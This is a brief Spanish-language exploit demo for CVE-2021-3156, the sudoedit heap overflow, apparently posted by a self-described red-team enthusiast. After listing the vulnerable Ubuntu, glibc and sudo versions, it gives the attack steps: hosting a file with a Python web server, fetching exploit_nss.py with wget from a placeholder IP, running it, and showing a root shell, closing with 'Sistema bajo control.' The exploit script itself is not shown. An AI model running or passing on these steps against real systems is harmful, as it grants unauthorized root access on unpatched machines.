
CVE-2021-3156-Exploit-Demo
📅 Fecha: 2025-06-08
✍️ Autor: @TopskiyPavelQwertyGang
🧠 Investigador de Seguridad | Entusiasta del Red Team
sudoedit (sudo)El desbordamiento de heap en sudoedit permite a un usuario local obtener acceso root
al ejecutar el comando sudoedit con parámetros preparados de antemano.
La explotación es efectiva en versiones de sudo < 1.9.5p2, incluidas las imágenes populares de Ubuntu/Debian/CentOS.
Incluso con ASLR habilitado, la vulnerabilidad sigue siendo explotable.
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (vulnerable)
ASLR : 2 (habilitado)
glibc y sudo:ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
La explotación de CVE-2021-3156 sigue siendo posible incluso con ASLR activo, si glibc ≥ 2.26 y sudo está en una versión vulnerable.
El exploit más estable resultó ser exploit_nss.py, que funciona a la primera con una configuración NSS correcta.
🧨 Sistema bajo control.